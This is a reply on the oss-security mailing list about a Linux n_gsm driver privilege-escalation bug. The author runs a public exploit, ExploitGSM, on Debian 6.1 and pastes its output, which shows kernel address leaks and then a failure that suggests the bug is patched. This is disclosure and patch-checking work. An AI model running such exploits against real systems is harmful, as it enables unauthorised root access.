From: "Dr. Christopher Kunz" <info@christopher-kunz.de>
To: oss-security@lists.openwall.com
Date: Wed, 17 Apr 2024 10:47:46 +0200
Subject: Re: [oss-security] New Linux LPE via GSMIOC_SETCONF_DLCI?
In-Reply-To: <20240416201602.GA21501@openwall.com>
References: <607d5716-128f-44c5-ab52-6dde4ca6e8a4@christopher-kunz.de> <20240410211457.GA20881@openwall.com> <20240416201602.GA21501@openwall.com>
On 16.04.24 at 22:16, Solar Designer wrote:
> I'm puzzled by the lack of follow-ups on this, but anyway @FFFVR_
> tweeted they also found (more) vulnerabilities in the n_gsm driver:
>

FWIW, YuriiCrimson's bug for 5.15 - 6.1 seems to be patched on current Debian:

debianexploitgsm:/tmp/ExploitGSM/ExploitGSM_5_15_to_6_1$ ./ExploitGSM debian
kallsyms restricted, begin retvial kallsyms table
detected kernel path-> /boot/vmlinuz-6.1.0-20-amd64
detected compressed format -> xz
Uncompressed kernel size -> 65900116
successfully taken kernel!
begin try leak startup_xen!
startup_xen leaked address  -> ffffffff8546f1c0
text leaked address         -> ffffffff83400000
lockdep_map_size     -> 32
spinlock_t_size      -> 4
mutex_size           -> 32
gsm_mux_event_offset -> 56
Error set line discipline N_GSM, Operation not permitted

--cku